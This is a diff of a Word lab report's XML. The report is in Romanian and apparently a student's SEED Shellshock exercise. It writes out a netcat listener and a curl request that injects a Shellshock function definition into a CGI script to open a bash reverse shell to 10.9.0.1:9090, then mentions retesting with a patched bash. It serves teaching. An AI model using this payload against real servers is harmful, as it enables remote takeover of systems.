+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">presupunem ca atacatorul este masina noastra virtuala care va asculta pe portul 9090: prin comanada: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>netcat -l 9090 -k</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="23">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5715000" cy="651510"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="22" name="Image22" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="22" name="Image22" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId33"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="651510"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="29"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">atacam programul server printr-un curl in care injectam prin intermediul unei variabile, de exemplu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">BIRLUTIU, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>un cod prin care se creeaza un reverse shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="29"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hell-ul interactiv se va deschide prin: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>/bin/bash -i &gt; /dev/tcp/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="C9211E"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">10.9.0.1/9090 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>0&lt;&amp;1 2&gt;&amp;1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00A933"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>comanda completa:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>BIRLUTIU</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>() { echo salut;}; echo Content_type: text/plain; echo;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>/bin/bash -i &gt; /dev/tcp/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:color w:val="C9211E"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">10.9.0.1/9090 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>0&lt;&amp;1 2&gt;&amp;1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>" -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId34">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>vul</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>.cgi</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:tab/>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>am executat comanda si am obtinut reverse shell-ul si putem observa cum am obtinut un shell interactiv a carui iesire este tcp si intrarea la fel prin tcp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="24">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="3810000"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="23" name="Image23" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="23" name="Image23" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId35"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3810000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
       </w:r>
     </w:p>
     <w:p>
@@ -5033,15 +5594,68 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="1440" w:hanging="0"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In prima faza, pentru a folosi un bash corectat, am modificat in interiorul containrul fisierul </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">vul.cgi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#!/bin/bash </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>si am repetat apoi pasii de la sarcina 3 si 4 ( una dintre aceste sarcini)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5057,7 +5671,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId32"/>
+      <w:headerReference w:type="default" r:id="rId36"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -6492,6 +7106,143 @@
   <w:abstractNum w:abstractNumId="11">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="12">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -6640,6 +7391,9 @@
   </w:num>
   <w:num w:numId="11">
     <w:abstractNumId w:val="11"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="12"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
+++ b/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
@@ -5178,17 +5178,7 @@
           <w:szCs w:val="22"/>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:sz w:val="22"/>
